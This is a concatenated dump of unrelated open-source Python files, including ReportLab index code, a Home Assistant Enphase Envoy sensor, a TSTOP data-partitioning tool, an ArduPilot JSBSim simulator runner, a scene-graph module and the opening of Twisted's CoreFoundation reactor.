return (self.width, self.height)
def split(self, availWidth, availHeight):
"""At this stage we do not care about splitting the entries,
we will just return a list of platypus tables. Presumably the
calling app has a pointer to the original TableOfContents object;
Platypus just sees tables.
"""
return self._table.splitOn(self.canv,availWidth, availHeight)
def drawOn(self, canvas, x, y, _sW=0):
"""Don't do this at home! The standard calls for implementing
draw(); we are hooking this in order to delegate ALL the drawing
work to the embedded table object.
"""
self._table.drawOn(canvas, x, y, _sW)
def makeTuple(x):
if hasattr(x, '__iter__'):
return tuple(x)
return (x,)
class SimpleIndex(IndexingFlowable):
"""Creates multi level indexes.
The styling can be cutomized and alphabetic headers turned on and off.
"""
def __init__(self, **kwargs):
"""
Constructor of SimpleIndex.
Accepts the same arguments as the setup method.
"""
#keep stuff in a dictionary while building
self._entries = {}
self._lastEntries = {}
self._flowable = None
self.setup(**kwargs)
def getFormatFunc(self,format):
try:
D = {}
exec('from reportlab.lib.sequencer import _format_%s as formatFunc' % format, D)
return D['formatFunc']
except ImportError:
raise ValueError('Unknown format %r' % format)
def setup(self, style=None, dot=None, tableStyle=None, headers=True, name=None, format='123', offset=0):
"""
This method makes it possible to change styling and other parameters on an existing object.
style is the paragraph style to use for index entries.
dot can either be None or a string. If it's None, entries are immediatly followed by their
corresponding page numbers. If it's a string, page numbers are aligned on the right side
of the document and the gap filled with a repeating sequence of the string.
tableStyle is the style used by the table which the index uses to draw itself. Use this to
change properties like spacing between elements.
headers is a boolean. If it is True, alphabetic headers are displayed in the Index when the first
letter changes. If False, we just output some extra space before the next item
name makes it possible to use several indexes in one document. If you want this use this
parameter to give each index a unique name. You can then index a term by refering to the
name of the index which it should appear in:
<index item="term" name="myindex" />
format can be 'I', 'i', '123', 'ABC', 'abc'
"""
if style is None:
style = ParagraphStyle(name='index',
fontName=_baseFontName,
fontSize=11)
self.textStyle = style
self.tableStyle = tableStyle or defaultTableStyle
self.dot = dot
self.headers = headers
if name is None:
from reportlab.platypus.paraparser import DEFAULT_INDEX_NAME as name
self.name = name
self.formatFunc = self.getFormatFunc(format)
self.offset = offset
def __call__(self,canv,kind,label):
try:
terms, format, offset = decode_label(label)
except:
terms = label
format = offset = None
if format is None:
formatFunc = self.formatFunc
else:
formatFunc = self.getFormatFunc(format)
if offset is None:
offset = self.offset
terms = commasplit(terms)
pns = formatFunc(canv.getPageNumber()-offset)
key = 'ix_%s_%s_p_%s' % (self.name, label, pns)
info = canv._curr_tx_info
canv.bookmarkHorizontal(key, info['cur_x'], info['cur_y'] + info['leading'])
self.addEntry(terms, pns, key)
def getCanvasMaker(self, canvasmaker=canvas.Canvas):
def newcanvasmaker(*args, **kwargs):
from reportlab.pdfgen import canvas
c = canvasmaker(*args, **kwargs)
setattr(c,self.name,self)
return c
return newcanvasmaker
def isIndexing(self):
return 1
def isSatisfied(self):
return (self._entries == self._lastEntries)
def beforeBuild(self):
# keep track of the last run
self._lastEntries = self._entries.copy()
self.clearEntries()
def clearEntries(self):
self._entries = {}
def notify(self, kind, stuff):
"""The notification hook called to register all kinds of events.
Here we are interested in 'IndexEntry' events only.
"""
if kind == 'IndexEntry':
(text, pageNum) = stuff
self.addEntry(text, pageNum)
def addEntry(self, text, pageNum, key=None):
"""Allows incremental buildup"""
self._entries.setdefault(makeTuple(text),set([])).add((pageNum, key))
def split(self, availWidth, availHeight):
"""At this stage we do not care about splitting the entries,
we will just return a list of platypus tables. Presumably the
calling app has a pointer to the original TableOfContents object;
Platypus just sees tables.
"""
return self._flowable.splitOn(self.canv,availWidth, availHeight)
def _getlastEntries(self, dummy=[(['Placeholder for index'],enumerate((None,)*3))]):
'''Return the last run's entries! If there are none, returns dummy.'''
if not self._lastEntries:
if self._entries:
return list(self._entries.items())
return dummy
return list(self._lastEntries.items())
def _build(self,availWidth,availHeight):
_tempEntries = self._getlastEntries()
def getkey(seq):
return [x.upper() for x in seq[0]]
_tempEntries.sort(key=getkey)
leveloffset = self.headers and 1 or 0
def drawIndexEntryEnd(canvas, kind, label):
'''Callback to draw dots and page numbers after each entry.'''
style = self.getLevelStyle(leveloffset)
pages = decode_label(label)
drawPageNumbers(canvas, style, pages, availWidth, availHeight, self.dot)
self.canv.drawIndexEntryEnd = drawIndexEntryEnd
alpha = ''
tableData = []
lastTexts = []
alphaStyle = self.getLevelStyle(0)
for texts, pageNumbers in _tempEntries:
texts = list(texts)
#track when the first character changes; either output some extra
#space, or the first letter on a row of its own. We cannot do
#widow/orphan control, sadly.
nalpha = texts[0][0].upper()
if alpha != nalpha:
alpha = nalpha
if self.headers:
header = alpha
else:
header = ' '
tableData.append([Spacer(1, alphaStyle.spaceBefore),])
tableData.append([Paragraph(header, alphaStyle),])
tableData.append([Spacer(1, alphaStyle.spaceAfter),])
i, diff = listdiff(lastTexts, texts)
if diff:
lastTexts = texts
texts = texts[i:]
label = encode_label(list(pageNumbers))
texts[-1] = '%s<onDraw name="drawIndexEntryEnd" label="%s"/>' % (texts[-1], label)
for text in texts:
#Platypus and RML differ on how parsed XML attributes are escaped.
#e.g. <index item="M&S"/>. The only place this seems to bite us is in
#the index entries so work around it here.
text = escapeOnce(text)
style = self.getLevelStyle(i+leveloffset)
para = Paragraph(text, style)
if style.spaceBefore:
tableData.append([Spacer(1, style.spaceBefore),])
tableData.append([para,])
i += 1
self._flowable = Table(tableData, colWidths=[availWidth], style=self.tableStyle)
def wrap(self, availWidth, availHeight):
"All table properties should be known by now."
self._build(availWidth,availHeight)
self.width, self.height = self._flowable.wrapOn(self.canv,availWidth, availHeight)
return self.width, self.height
def drawOn(self, canvas, x, y, _sW=0):
"""Don't do this at home! The standard calls for implementing
draw(); we are hooking this in order to delegate ALL the drawing
work to the embedded table object.
"""
self._flowable.drawOn(canvas, x, y, _sW)
def draw(self):
t = self._flowable
ocanv = getattr(t,'canv',None)
if not ocanv:
t.canv = self.canv
try:
t.draw()
finally:
if not ocanv:
del t.canv
def getLevelStyle(self, n):
'''Returns the style for level n, generating and caching styles on demand if not present.'''
if not hasattr(self.textStyle, '__iter__'):
self.textStyle = [self.textStyle]
try:
return self.textStyle[n]
except IndexError:
self.textStyle = list(self.textStyle)
prevstyle = self.getLevelStyle(n-1)
self.textStyle.append(ParagraphStyle(
name='%s-%d-indented' % (prevstyle.name, n),
parent=prevstyle,
firstLineIndent = prevstyle.firstLineIndent+.2*cm,
leftIndent = prevstyle.leftIndent+.2*cm))
return self.textStyle[n]
AlphabeticIndex = SimpleIndex
def listdiff(l1, l2):
m = min(len(l1), len(l2))
for i in range(m):
if l1[i] != l2[i]:
return i, l2[i:]
return m, l2[m:]
class ReferenceText(IndexingFlowable):
"""Fakery to illustrate how a reference would work if we could
put it in a paragraph."""
def __init__(self, textPattern, targetKey):
self.textPattern = textPattern
self.target = targetKey
self.paraStyle = ParagraphStyle('tmp')
self._lastPageNum = None
self._pageNum = -999
self._para = None
def beforeBuild(self):
self._lastPageNum = self._pageNum
def notify(self, kind, stuff):
if kind == 'Target':
(key, pageNum) = stuff
if key == self.target:
self._pageNum = pageNum
def wrap(self, availWidth, availHeight):
text = self.textPattern % self._lastPageNum
self._para = Paragraph(text, self.paraStyle)
return self._para.wrap(availWidth, availHeight)
def drawOn(self, canvas, x, y, _sW=0):
self._para.drawOn(canvas, x, y, _sW)
| mit |
mKeRix/home-assistant | homeassistant/components/enphase_envoy/sensor.py | 15 | 5480 | """Support for Enphase Envoy solar energy monitor."""
import logging
from envoy_reader.envoy_reader import EnvoyReader
import requests
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_IP_ADDRESS,
CONF_MONITORED_CONDITIONS,
CONF_NAME,
CONF_PASSWORD,
CONF_USERNAME,
ENERGY_WATT_HOUR,
POWER_WATT,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
SENSORS = {
"production": ("Envoy Current Energy Production", POWER_WATT),
"daily_production": ("Envoy Today's Energy Production", ENERGY_WATT_HOUR),
"seven_days_production": (
"Envoy Last Seven Days Energy Production",
ENERGY_WATT_HOUR,
),
"lifetime_production": ("Envoy Lifetime Energy Production", ENERGY_WATT_HOUR),
"consumption": ("Envoy Current Energy Consumption", POWER_WATT),
"daily_consumption": ("Envoy Today's Energy Consumption", ENERGY_WATT_HOUR),
"seven_days_consumption": (
"Envoy Last Seven Days Energy Consumption",
ENERGY_WATT_HOUR,
),
"lifetime_consumption": ("Envoy Lifetime Energy Consumption", ENERGY_WATT_HOUR),
"inverters": ("Envoy Inverter", POWER_WATT),
}
ICON = "mdi:flash"
CONST_DEFAULT_HOST = "envoy"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_IP_ADDRESS, default=CONST_DEFAULT_HOST): cv.string,
vol.Optional(CONF_USERNAME, default="envoy"): cv.string,
vol.Optional(CONF_PASSWORD, default=""): cv.string,
vol.Optional(CONF_MONITORED_CONDITIONS, default=list(SENSORS)): vol.All(
cv.ensure_list, [vol.In(list(SENSORS))]
),
vol.Optional(CONF_NAME, default=""): cv.string,
}
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Enphase Envoy sensor."""
ip_address = config[CONF_IP_ADDRESS]
monitored_conditions = config[CONF_MONITORED_CONDITIONS]
name = config[CONF_NAME]
username = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
envoy_reader = EnvoyReader(ip_address, username, password)
entities = []
# Iterate through the list of sensors
for condition in monitored_conditions:
if condition == "inverters":
try:
inverters = await envoy_reader.inverters_production()
except requests.exceptions.HTTPError:
_LOGGER.warning(
"Authentication for Inverter data failed during setup: %s",
ip_address,
)
continue
if isinstance(inverters, dict):
for inverter in inverters:
entities.append(
Envoy(
envoy_reader,
condition,
f"{name}{SENSORS[condition][0]} {inverter}",
SENSORS[condition][1],
)
)
else:
entities.append(
Envoy(
envoy_reader,
condition,
f"{name}{SENSORS[condition][0]}",
SENSORS[condition][1],
)
)
async_add_entities(entities)
class Envoy(Entity):
"""Implementation of the Enphase Envoy sensors."""
def __init__(self, envoy_reader, sensor_type, name, unit):
"""Initialize the sensor."""
self._envoy_reader = envoy_reader
self._type = sensor_type
self._name = name
self._unit_of_measurement = unit
self._state = None
self._last_reported = None
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return ICON
@property
def device_state_attributes(self):
"""Return the state attributes."""
if self._type == "inverters":
return {"last_reported": self._last_reported}
return None
async def async_update(self):
"""Get the energy production data from the Enphase Envoy."""
if self._type != "inverters":
_state = await getattr(self._envoy_reader, self._type)()
if isinstance(_state, int):
self._state = _state
else:
_LOGGER.error(_state)
self._state = None
elif self._type == "inverters":
try:
inverters = await (self._envoy_reader.inverters_production())
except requests.exceptions.HTTPError:
_LOGGER.warning(
"Authentication for Inverter data failed during update: %s",
self._envoy_reader.host,
)
if isinstance(inverters, dict):
serial_number = self._name.split(" ")[2]
self._state = inverters[serial_number][0]
self._last_reported = inverters[serial_number][1]
else:
self._state = None
| mit |
gpersistence/tstop | python/persistence/PartitionData.py | 1 | 8153 | #TSTOP
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
import random
import os
import sys
import argparse
from math import ceil
import numpy
from sklearn.cross_validation import StratifiedKFold
from Datatypes.JSONObject import load_data, save_data
from Datatypes.Segments import SegmentInfo
from Datatypes.Configuration import Configuration
from Datatypes.TrainTestPartitions import TrainTestPartition, TrainTestPartitions
def PartitionData(segment_info, split, avoid_overlap=False, segment_size=0,
file_based=False, preserve_labels=False, override_preset=False, surpress_warning=False, seed=None) :
'''
Accepts a list of Datatype.Segments.SegmentInfo and a float between 0 and 1,
and outputs a pair of lists of indices, (train, test) corresponding
to a parition of the input list
len(train) approximates split * len(segment_info)
Intersection of train and test is an empty set
Union of train and test is not guaranteed to be range(len(segment_info))
Optional arguments:
avoid_overlap omits entries in test that would have overlapping data with entries in train,
as indicated by the range [segment_start:segment_start+segment_size]
segment_size interacts with avoid overlap, because only segment_start is contained in the
SegmentInfo class
file_based creates partitions where segments with the same filename for source data are
in the same partition
preserve_label tries to split the populations of labels evenly
'''
segment_count = len(segment_info)
segment_range = range(segment_count)
# check to see if we have a preset train / test split for all data and we aren't overriding that
if not override_preset and [0 for s in segment_info if s.learning == None] == [] :
return TrainTestPartition([i for i in segment_range if segment_info[i].learning == 'train'],
[i for i in segment_range if segment_info[i].learning == 'test'], None)
train_goal_len = int(ceil(segment_count * split))
if preserve_labels :
labels = [s.max_label() for s in segment_info]
label_set = list(set(labels))
label_count = [(l0,len([l for l in labels if l == l0])) for l0 in label_set]
label_goal = [(str(l), int(round(c * split))) for (l,c) in label_count]
for ((l0,g),(l1,c)) in zip(label_goal, label_count) :
if (g == 0) or (g == c) and not surpress_warning:
print "PartitionData warning: not enough entries (%d) of label %s to properly make a train / test split of ratio %s" % (c, l0, split)
label_goal = dict(label_goal)
train = []
test = []
if seed != None :
random.seed(seed)
state = random.getstate()
if file_based :
files = list(set([s.filename for s in segment_info]))
random.shuffle(files)
for f in files :
f_indices = [x for (x,y) in zip(segment_range, segment_info) if y.filename == f]
if preserve_labels :
f_labels = [str(labels[i]) for i in f_indices]
extend_train = True
for l in label_goal.keys() :
count = len([l0 for l0 in f_labels if l0 == l])
if count > label_goal[l] :
extend_train = False
break
if extend_train :
train.extend(f_indices)
for l in label_goal.keys() :
count = len([l0 for l0 in f_labels if l0 == l])
label_goal[l] = label_goal[l] - count
else :
test.extend(f_indices)
else :
if len(train) + len(f_indices) < train_goal_len :
train.extend(f_indices)
else :
test.extend(f_indices)
else :
random.shuffle(segment_range)
if preserve_labels :
for i in segment_range:
l = str(labels[i])
if label_goal[l] > 0 :
train.append(i)
label_goal[l] = label_goal[l] - 1
else :
test.append(i)
else :
train = segment_range[0:train_goal_len]
test = segment_range[train_goal_len:]
return TrainTestPartition(train,test,state)
def generate_partitions(config, segment_info, cv_iterations=0, seed=None) :
partition = PartitionData(segment_info,
config.learning_split,
avoid_overlap=True,
segment_size=config.segment_size,
file_based=True if (config.data_type == "BirdSoundsSegments" or
config.data_type == "KitchenMocapSegments") \
else False,
preserve_labels=True,
seed=seed)
all_labels = [segment_info[i].max_label() for i in partition.train]
if cv_iterations > 0 :
skf = StratifiedKFold(all_labels, n_folds=cv_iterations)
cross_validation = [TrainTestPartition([partition.train[i] for i in train_index],
[partition.train[i] for i in test_index], None) \
for train_index, test_index in skf]
else :
cross_validation = None
learning_trials = [PartitionData(segment_info,
config.learning_split,
avoid_overlap=True,
segment_size=config.segment_size,
file_based=True if (config.data_type == "BirdSoundsSegments" or
config.data_type == "KitchenMocapSegments") \
else False,
preserve_labels=True,
seed=None) for i in range(config.learning_iterations)]
return TrainTestPartitions(config, segment_info, cross_validation, learning_trials)
if __name__ == "__main__" :
parser = argparse.ArgumentParser("Tool to generate train / test splits for testing and cross validation")
parser.add_argument("--segments", "-i")
parser.add_argument("--outfile", "-o")
parser.add_argument("--learning-split", "-s", type=float)
parser.add_argument("--learning-iterations", "-I", type=int)
parser.add_argument("--cv-iterations", "-v", default=5, type=int)
parser.add_argument("--seed", "-S")
args = parser.parse_args(sys.argv[1:])
segments_json = load_data(args.segments, 'segments', None, None, sys.argv[0] + " : ")
if segments_json == None :
print "Could not load Segments from %s" % (args.segments,)
sys.exit(1)
segment_info = [SegmentInfo.fromJSONDict(s) for s in segments_json['segments']]
config = Configuration.fromJSONDict(segments_json['config'])
if args.learning_split != None :
config.learning_split = args.learning_split
if args.learning_iterations != None :
config.learning_iterations = args.learning_iterations
output = generate_partitions(config, segment_info, cv_iterations=args.cv_iterations, seed=args.seed)
if args.outfile == None :
args.outfile = TrainTestPartitions.get_partition_filename(config)
print "Writing %s" % (args.outfile,)
save_data(args.outfile, output.toJSONDict())
| gpl-3.0 |
AeroDragon/ArduCopter | Tools/autotest/jsbsim/runsim.py | 32 | 11496 | #!/usr/bin/env python
# run a jsbsim model as a child process
import sys, os, pexpect, socket
import math, time, select, struct, signal, errno
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'pysim'))
import util, atexit, fdpexpect
from pymavlink import fgFDM
class control_state(object):
def __init__(self):
self.aileron = 0
self.elevator = 0
self.throttle = 0
self.rudder = 0
self.ground_height = 0
sitl_state = control_state()
def interpret_address(addrstr):
'''interpret a IP:port string'''
a = addrstr.split(':')
a[1] = int(a[1])
return tuple(a)
def jsb_set(variable, value):
'''set a JSBSim variable'''
global jsb_console
jsb_console.send('set %s %s\r\n' % (variable, value))
def setup_template(home):
'''setup aircraft/Rascal/reset.xml'''
global opts
v = home.split(',')
if len(v) != 4:
print("home should be lat,lng,alt,hdg - '%s'" % home)
sys.exit(1)
latitude = float(v[0])
longitude = float(v[1])
altitude = float(v[2])
heading = float(v[3])
sitl_state.ground_height = altitude
template = os.path.join('aircraft', 'Rascal', 'reset_template.xml')
reset = os.path.join('aircraft', 'Rascal', 'reset.xml')
xml = open(template).read() % { 'LATITUDE' : str(latitude),
'LONGITUDE' : str(longitude),
'HEADING' : str(heading) }
open(reset, mode='w').write(xml)
print("Wrote %s" % reset)
baseport = int(opts.simout.split(':')[1])
template = os.path.join('jsbsim', 'fgout_template.xml')
out = os.path.join('jsbsim', 'fgout.xml')
xml = open(template).read() % { 'FGOUTPORT' : str(baseport+3) }
open(out, mode='w').write(xml)
print("Wrote %s" % out)
template = os.path.join('jsbsim', 'rascal_test_template.xml')
out = os.path.join('jsbsim', 'rascal_test.xml')
xml = open(template).read() % { 'JSBCONSOLEPORT' : str(baseport+4) }
open(out, mode='w').write(xml)
print("Wrote %s" % out)
def process_sitl_input(buf):
'''process control changes from SITL sim'''
control = list(struct.unpack('<14H', buf))
pwm = control[:11]
(speed, direction, turbulance) = control[11:]
global wind
wind.speed = speed*0.01
wind.direction = direction*0.01
wind.turbulance = turbulance*0.01
aileron = (pwm[0]-1500)/500.0
elevator = (pwm[1]-1500)/500.0
throttle = (pwm[2]-1000)/1000.0
rudder = (pwm[3]-1500)/500.0
if opts.elevon:
# fake an elevon plane
ch1 = aileron
ch2 = elevator
aileron = (ch2-ch1)/2.0
# the minus does away with the need for RC2_REV=-1
elevator = -(ch2+ch1)/2.0
if opts.vtail:
# fake an elevon plane
ch1 = elevator
ch2 = rudder
# this matches VTAIL_OUTPUT==2
elevator = (ch2-ch1)/2.0
rudder = (ch2+ch1)/2.0
if aileron != sitl_state.aileron:
jsb_set('fcs/aileron-cmd-norm', aileron)
sitl_state.aileron = aileron
if elevator != sitl_state.elevator:
jsb_set('fcs/elevator-cmd-norm', elevator)
sitl_state.elevator = elevator
if rudder != sitl_state.rudder:
jsb_set('fcs/rudder-cmd-norm', rudder)
sitl_state.rudder = rudder
if throttle != sitl_state.throttle:
jsb_set('fcs/throttle-cmd-norm', throttle)
sitl_state.throttle = throttle
def update_wind(wind):
'''update wind simulation'''
(speed, direction) = wind.current()
jsb_set('atmosphere/psiw-rad', math.radians(direction))
jsb_set('atmosphere/wind-mag-fps', speed/0.3048)
def process_jsb_input(buf):
'''process FG FDM input from JSBSim'''
global fdm, fg_out, sim_out
fdm.parse(buf)
if fg_out:
try:
agl = fdm.get('agl', units='meters')
fdm.set('altitude', agl+sitl_state.ground_height, units='meters')
fdm.set('rpm', sitl_state.throttle*1000)
fg_out.send(fdm.pack())
except socket.error as e:
if e.errno not in [ errno.ECONNREFUSED ]:
raise
simbuf = struct.pack('<17dI',
fdm.get('latitude', units='degrees'),
fdm.get('longitude', units='degrees'),
fdm.get('altitude', units='meters'),
fdm.get('psi', units='degrees'),
fdm.get('v_north', units='mps'),
fdm.get('v_east', units='mps'),
fdm.get('v_down', units='mps'),
fdm.get('A_X_pilot', units='mpss'),
fdm.get('A_Y_pilot', units='mpss'),
fdm.get('A_Z_pilot', units='mpss'),
fdm.get('phidot', units='dps'),
fdm.get('thetadot', units='dps'),
fdm.get('psidot', units='dps'),
fdm.get('phi', units='degrees'),
fdm.get('theta', units='degrees'),
fdm.get('psi', units='degrees'),
fdm.get('vcas', units='mps'),
0x4c56414f)
try:
sim_out.send(simbuf)
except socket.error as e:
if e.errno not in [ errno.ECONNREFUSED ]:
raise
##################
# main program
from optparse import OptionParser
parser = OptionParser("runsim.py [options]")
parser.add_option("--simin", help="SITL input (IP:port)", default="127.0.0.1:5502")
parser.add_option("--simout", help="SITL output (IP:port)", default="127.0.0.1:5501")
parser.add_option("--fgout", help="FG display output (IP:port)", default="127.0.0.1:5503")
parser.add_option("--home", type='string', help="home lat,lng,alt,hdg (required)")
parser.add_option("--script", type='string', help='jsbsim model script', default='jsbsim/rascal_test.xml')
parser.add_option("--options", type='string', help='jsbsim startup options')
parser.add_option("--elevon", action='store_true', default=False, help='assume elevon input')
parser.add_option("--vtail", action='store_true', default=False, help='assume vtail input')
parser.add_option("--wind", dest="wind", help="Simulate wind (speed,direction,turbulance)", default='0,0,0')
(opts, args) = parser.parse_args()
for m in [ 'home', 'script' ]:
if not opts.__dict__[m]:
print("Missing required option '%s'" % m)
parser.print_help()
sys.exit(1)
os.chdir(util.reltopdir('Tools/autotest'))
# kill off child when we exit
atexit.register(util.pexpect_close_all)
setup_template(opts.home)
# start child
cmd = "JSBSim --realtime --suspend --nice --simulation-rate=1000 --logdirectivefile=jsbsim/fgout.xml --script=%s" % opts.script
if opts.options:
cmd += ' %s' % opts.options
jsb = pexpect.spawn(cmd, logfile=sys.stdout, timeout=10)
jsb.delaybeforesend = 0
util.pexpect_autoclose(jsb)
i = jsb.expect(["Successfully bound to socket for input on port (\d+)",
"Could not bind to socket for input"])
if i == 1:
print("Failed to start JSBSim - is another copy running?")
sys.exit(1)
jsb_out_address = interpret_address("127.0.0.1:%u" % int(jsb.match.group(1)))
jsb.expect("Creating UDP socket on port (\d+)")
jsb_in_address = interpret_address("127.0.0.1:%u" % int(jsb.match.group(1)))
jsb.expect("Successfully connected to socket for output")
jsb.expect("JSBSim Execution beginning")
# setup output to jsbsim
print("JSBSim console on %s" % str(jsb_out_address))
jsb_out = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
jsb_out.connect(jsb_out_address)
jsb_console = fdpexpect.fdspawn(jsb_out.fileno(), logfile=sys.stdout)
jsb_console.delaybeforesend = 0
# setup input from jsbsim
print("JSBSim FG FDM input on %s" % str(jsb_in_address))
jsb_in = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
jsb_in.bind(jsb_in_address)
jsb_in.setblocking(0)
# socket addresses
sim_out_address = interpret_address(opts.simout)
sim_in_address = interpret_address(opts.simin)
# setup input from SITL sim
sim_in = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sim_in.bind(sim_in_address)
sim_in.setblocking(0)
# setup output to SITL sim
sim_out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sim_out.connect(interpret_address(opts.simout))
sim_out.setblocking(0)
# setup possible output to FlightGear for display
fg_out = None
if opts.fgout:
fg_out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
fg_out.connect(interpret_address(opts.fgout))
# setup wind generator
wind = util.Wind(opts.wind)
fdm = fgFDM.fgFDM()
jsb_console.send('info\n')
jsb_console.send('resume\n')
jsb.expect("trim computation time")
time.sleep(1.5)
jsb_console.logfile = None
print("Simulator ready to fly")
def main_loop():
'''run main loop'''
tnow = time.time()
last_report = tnow
last_sim_input = tnow
last_wind_update = tnow
frame_count = 0
paused = False
while True:
rin = [jsb_in.fileno(), sim_in.fileno(), jsb_console.fileno(), jsb.fileno()]
try:
(rin, win, xin) = select.select(rin, [], [], 1.0)
except select.error:
util.check_parent()
continue
tnow = time.time()
if jsb_in.fileno() in rin:
buf = jsb_in.recv(fdm.packet_size())
process_jsb_input(buf)
frame_count += 1
if sim_in.fileno() in rin:
simbuf = sim_in.recv(28)
process_sitl_input(simbuf)
last_sim_input = tnow
# show any jsbsim console output
if jsb_console.fileno() in rin:
util.pexpect_drain(jsb_console)
if jsb.fileno() in rin:
util.pexpect_drain(jsb)
if tnow - last_sim_input > 0.2:
if not paused:
print("PAUSING SIMULATION")
paused = True
jsb_console.send('hold\n')
else:
if paused:
print("RESUMING SIMULATION")
paused = False
jsb_console.send('resume\n')
# only simulate wind above 5 meters, to prevent crashes while
# waiting for takeoff
if tnow - last_wind_update > 0.1:
update_wind(wind)
last_wind_update = tnow
if tnow - last_report > 3:
print("FPS %u asl=%.1f agl=%.1f roll=%.1f pitch=%.1f a=(%.2f %.2f %.2f)" % (
frame_count / (time.time() - last_report),
fdm.get('altitude', units='meters'),
fdm.get('agl', units='meters'),
fdm.get('phi', units='degrees'),
fdm.get('theta', units='degrees'),
fdm.get('A_X_pilot', units='mpss'),
fdm.get('A_Y_pilot', units='mpss'),
fdm.get('A_Z_pilot', units='mpss')))
frame_count = 0
last_report = time.time()
def exit_handler():
'''exit the sim'''
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_IGN)
# JSBSim really doesn't like to die ...
if getattr(jsb, 'pid', None) is not None:
os.kill(jsb.pid, signal.SIGKILL)
jsb_console.send('quit\n')
jsb.close(force=True)
util.pexpect_close_all()
sys.exit(1)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
try:
main_loop()
except:
exit_handler()
raise
| gpl-3.0 |
clems71/pogle | pogle/pogle_scene.py | 1 | 3346 | from pogle_math import Vector, Matrix4x4, Transform
__author__ = 'Clement JACOB'
__copyright__ = "Copyright 2013, The Python OpenGL Engine"
__license__ = "Closed Source"
__version__ = "0.0.1"
__email__ = "clems71@gmail.com"
__status__ = "Prototype"
class Light(object):
def __init__(self, pos=Vector(0.0, 0.0, 0.0)):
self.position = pos
class Camera(object):
def __init__(self, proj=None, view=None):
if proj is None:
proj = Matrix4x4()
self.proj = proj
if view is None:
view = Matrix4x4()
self.view = view
self._follow_viewport = False
def lookat(self, eye, center=Vector(0, 0, 0), up=Vector(0, 1, 0)):
self.view = Matrix4x4.lookat(eye, center, up)
@staticmethod
def perspective(fovy, near, far):
cam = Camera(Matrix4x4.perspective(fovy, 1.0, near, far))
cam._near = near
cam._fovy = fovy
cam._far = far
cam._follow_viewport = True
return cam
@staticmethod
def ortho(near, far, width, height):
return Camera(Matrix4x4.ortho(near, far, width, height))
class Scene(object):
""" A scene is a container for all your objects.
Basically, it contains a root node to be rendered, a camera and
0 to 3 directional lights.
"""
def __init__(self, camera=None):
if camera is None:
camera = Camera()
self.passes = []
self.camera = camera
self.lights = []
self._nodes = []
def register_pass(self, pass_):
assert pass_ not in self.passes
self.passes.append(pass_)
def unregister_pass(self, pass_):
assert pass_ in self.passes
self.passes.remove(pass_)
def add_node(self, node):
assert node.scene == None, 'The node is already attached to a scene'
self._nodes.append(node)
node.scene = self
self.mark_renderlist_as_dirty()
def mark_renderlist_as_dirty(self):
for p in self.passes:
p.mark_renderlist_as_dirty()
def remove_node(self, node):
assert node.scene == self, 'The node is not attached to this scene'
self._nodes.remove(node)
node.scene = None
self.mark_renderlist_as_dirty()
def add_light(self, light):
self.lights.append(light)
def get_nodes(self, flag):
""" A method returning a list of all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
match = []
for n in self._nodes:
if n.has_flag(flag):
match.append(n)
return match
def get_nodes_i(self, flag):
""" A generator method returning all nodes having the flag 'flag'
flag -- The flag that must be present on all nodes returned
"""
for n in self._nodes:
if n.has_flag(flag):
yield n
def __len__(self):
return len(self._nodes)
@property
def nodes(self):
return self._nodes
class SceneNode(object):
NODE_HAS_GEOMETRY = 1
""" A basic base class for all node types
"""
def __init__(self, transform=None, flags=0x00000000):
self.name = ''
self.flags = flags
# Trick to avoid the one default arg instanciation for all
# If the default arg == Tranform(), every node which doesn't
# specify the transform arg, will use the shared object created
# on file parsing! Not what we want here.
if transform is None:
transform = Transform()
self.transform = transform
self.scene = None
def has_flag(self, flag):
return (self.flags & flag) != 0
| mit |
Immortalin/python-for-android | python-modules/twisted/twisted/internet/cfreactor.py | 49 | 17464 | # -*- test-case-name: twisted.internet.test.test_core -*-
# Copyright (c) 2010 Twisted Matrix Laboratories
# See LICENSE for details.
"""
A reactor for integrating with U{CFRunLoop<http://bit.ly/cfrunloop>}, the
CoreFoundation main loop used by MacOS X.
This is useful for integrating Twisted with U{PyObjC<http://pyobjc.sf.net/>}
applications.
"""
__all__ = [
'install',
'CFReactor'
]
import sys
from zope.interface import implements
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet.posixbase import PosixReactorBase, _Waker
from twisted.internet.selectreactor import _NO_FILENO, _NO_FILEDESC
from twisted.python import log
from CoreFoundation import (
CFRunLoopAddSource, CFRunLoopRemoveSource, CFRunLoopGetMain, CFRunLoopRun,
CFRunLoopStop, CFRunLoopTimerCreate, CFRunLoopAddTimer,
CFRunLoopTimerInvalidate, kCFAllocatorDefault, kCFRunLoopCommonModes,
CFAbsoluteTimeGetCurrent)
from CFNetwork import (
CFSocketCreateWithNative, CFSocketSetSocketFlags, CFSocketEnableCallBacks,
CFSocketCreateRunLoopSource, CFSocketDisableCallBacks, CFSocketInvalidate,
kCFSocketWriteCallBack, kCFSocketReadCallBack, kCFSocketConnectCallBack,
